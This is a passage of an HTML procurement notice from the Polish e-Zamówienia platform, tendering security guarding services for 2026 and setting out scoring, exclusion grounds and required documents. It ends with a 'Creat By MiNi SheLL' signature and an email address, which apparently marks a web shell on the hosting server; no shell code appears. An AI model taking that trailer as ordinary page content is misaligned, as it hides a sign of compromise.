poufność informacji, z którymi zapoznają się jego pracownicy, oraz przestrzega zasad ochrony informacji obowiązujących w ZCE. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79710000-4 - Usługi ochroniarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert przedstawione w tabeli poniżej.<br/>2. Zamawiający ustanawia następujące kryteria oceny ofert:<br/>2.1.	Kryterium nr 1: Cena brutto całego zamówienia (C) – waga kryterium 60 %, będzie obliczone na podstawie wzoru matematycznego: C = Cn/Cb* 60<br/>gdzie: <br/>C – kryterium – cena brutto całego zamówienia, <br/>Cn – najniższa oferowana cena brutto całego zamówienia, <br/>Cb – cena brutto całego zamówienia oferty badanej <br/><br/>a)	Cena całkowita brutto (z uwzględnieniem kwoty podatku od towarów i usług Vat) musi być podana w polskich złotych (PLN), z dokładnością nie większą niż dwa miejsca po przecinku. <br/>b)	Cena brutto Oferty musi obejmować wszystkie koszty, jakie mogą powstać w związku z realizacją Zamówienia, w tym podatek od towarów i usług (VAT), w szczególności obejmujące udział wskazanych osób do realizacji Zamówienia. <br/>c)	W przypadku udziału osób fizycznych, cena Oferty musi zawierać obligatoryjne obciążenia z tytułu składek ZUS i Fundusz Pracy po stronie pracownika i pracodawcy. <br/>d)	Wykonawca, w powyższym kryterium może otrzymać maksymalnie 60 pkt<br/><br/>2.2.	Kryterium nr 2: Doświadczenie zawodowe pracowników wskazanych do realizacji usługi (D) – waga kryterium 40 %. Ocena w tym kryterium zostanie dokonana na podstawie wypełnionego „Formularza oferty” i złożonej w nim deklaracji Wykonawcy stanowiącym załącznik nr 1 do SWZ, a liczba punktów zostanie przyznana w następujący sposób:<br/>a)	doświadczenie zawodowe pracowników wskazanych do realizacji usługi, co najmniej 3 lata – 40 pkt<br/>b)	doświadczenie zawodowe pracowników wskazanych do realizacji usługi, co najmniej 2 lata – 20 pkt<br/>c)	doświadczenie zawodowe pracowników wskazanych do realizacji usługi, co najmniej 1 rok – 10 pkt<br/>d)	doświadczenie zawodowe pracowników wskazanych do realizacji usługi, co najmniej 6 miesięcy – 0 pkt<br/><br/>Zamawiający oceni według powyższego schematu każdego pracownika z osobna, a następnie wyciągnie średnią arytmetyczną z uzyskanych punktów z zaokrągleniem do dwóch miejsc po przecinku). Średnia arytmetyczna będzie stanowić liczbę punktów w kryterium D.<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (N) wyliczoną zgodnie z poniższym wzorem:<br/>N = C + D,<br/>gdzie: N – łączna liczba punktów oferty ocenianej; <br/>C, D – liczby punktów uzyskane odpowiednio w kryteriach z pkt 19.4.1–19.4.2 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe pracowników wskazanych do realizacji usługi (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 8.2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: <br/> Zamawiający nie stawia warunku w powyższym zakresie. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Wykonawca spełni warunek, jeżeli posiada koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2025 r., poz. 532), ważną w dniu składania ofert, z terminem ważności na czas realizacji zamówienia oraz obszarem świadczenia usług obejmujących co najmniej Powiat Tatrzański. <br/>3)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>4)	zdolności technicznej lub zawodowej: <br/>a)	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej dwiema osobami przewidzianymi do realizacji zamówienia, z których każda posiada co najmniej sześć miesięcy doświadczenia w wykonywaniu zadań pracownika ochrony osób i mienia.<br/>Na potwierdzenie spełnienia warunku Wykonawca składa wykaz osób zawierający imię i nazwisko, opis doświadczenia z podaniem okresów jego zdobycia oraz podstawę dysponowania daną osobą, wraz z oświadczeniem o skierowaniu tych osób do realizacji zamówienia<br/>b)	Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał lub wykonuje co najmniej jedną usługę ochrony osób i mienia na rzecz podmiotu publicznego (na przykład jednostki samorządu terytorialnego, jej jednostki organizacyjnej, samorządowej jednostki budżetowej, państwowej osoby prawnej), o nieprzerwanym okresie realizacji co najmniej 12 miesięcy; w przypadku umowy w toku warunek uważa się za spełniony, jeżeli na dzień składania ofert zrealizowano co najmniej 10 miesięcy świadczenia.<br/>Na potwierdzenie spełnienia warunku Wykonawca składa wykaz usług z podaniem przedmiotu, dat, miejsca i odbiorcy oraz dowody należytego wykonania (poświadczenia odbiorcy; dopuszcza się oświadczenie Wykonawcy wyłącznie w przypadku uzasadnionej niemożności uzyskania poświadczenia).<br/>Uwaga!<br/>Dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.1.	Zgodnie z art. 274 ust. 1 Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>1.2.	Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>1.2.1.	Informację z Krajowego Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt. 1), 2) i 4) Ustawy PZP, sporządzoną nie wcześniej niż 6 miesięcy przed jej złożeniem.<br/>1.2.2.	Zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 Ustawy PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.<br/>1.2.3.	Zaświadczenie albo inny dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.<br/>1.2.4.	Odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) Ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>1.2.5.	Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Ustawy PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024r. poz. 594), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 4 do SWZ.<br/>1.2.6.	Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: art. 109 ust. 1 pkt 5-10 Ustawy PZP – załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.1.	Zgodnie z art. 274 ust. 1 Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>1.2.	Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>1.2.1.	Koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia, ważną w dniu składania ofert, z terminem ważności na czas realizacji zamówienia oraz obszarem świadczenia usług obejmujących co najmniej Powiat Tatrzański. <br/>1.2.2.	Wykaz usług (załącznik nr 3 do SWZ) wykonywanych w ciągu ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, spełniających warunek udziału w postępowaniu w zakresie doświadczenia zawodowego (rozdział VIII, pkt. 8.2 ppkt. 4 lit. a) SWZ), potwierdzonych dowodami określającymi czy wskazane dostawy zostały wykonane należycie.<br/>Dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty. <br/>1.2.3.	Wykaz osób (załącznik nr 9 do SWZ) przewidzianych do realizacji zamówienia (co najmniej dwie, zgodnie z rozdziałem VIII, pkt. 8.2 ppkt. 4 lit. a) SWZ), zawierający: imię i nazwisko, funkcję/przewidywaną rolę, opis doświadczenia w zadaniach pracownika ochrony osób i mienia z podaniem okresów zdobycia każdego doświadczenia (daty „od–do”, liczba miesięcy), oraz podstawę dysponowania osobą (zatrudnienie, umowa cywilnoprawna, zobowiązanie innego podmiotu). <br/>Uwaga!<br/>Wykaz osób i oświadczenia mają zawierać wyłącznie informacje niezbędne do oceny spełnienia warunku (tożsamość, rola, okresy i rodzaj doświadczenia, podstawa dysponowania). Na etapie kwalifikacji nie wymaga się kopii umów, świadectw pracy ani zaświadczeń o niekaralności dla personelu liniowego; Zamawiający może w umowie przewidzieć obowiązki weryfikacyjne wykonawcy i prawo wglądu w toku realizacji.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Dokumenty składane wraz z ofertą tj. interaktywnym formularzem oferty który Wykonawca jest zobowiązany pobrać i uzupełnić z Platformy e-Zamówienia: <br/>1.1. Formularz oferty wg. wzoru Zamawiającego (załącznik nr 1 do SWZ), <br/>1.2. Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy PZP (załącznik nr 2 do SWZ):<br/>1.3.	Zobowiązanie podmiotu trzeciego - jeśli dotyczy (załącznik nr 5 do SWZ). Zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy potwierdza, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>a)	zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b)	sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>1.4.	Pełnomocnictwo - jeśli dotyczy (załącznik nr 7 do SWZ).<br/>1.5.	Zastrzeżenie tajemnicy przedsiębiorstwa - jeśli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X pkt. 10.1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 6 do SWZ (taki sam dla wszystkich części).<br/>2.Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym <br/>w ofercie.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 - 455 Ustawy PZP oraz wskazanym we wzorze umowy, stanowiącym Załącznik nr 6 do SWZ.<br/>4.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej.<br/>5.	Wniesienie zastrzeżeń do umowy po zakończeniu postępowania przetargowego będzie traktowane przez Zamawiającego jako uchylanie się Wykonawcy od zawarcia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-26 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com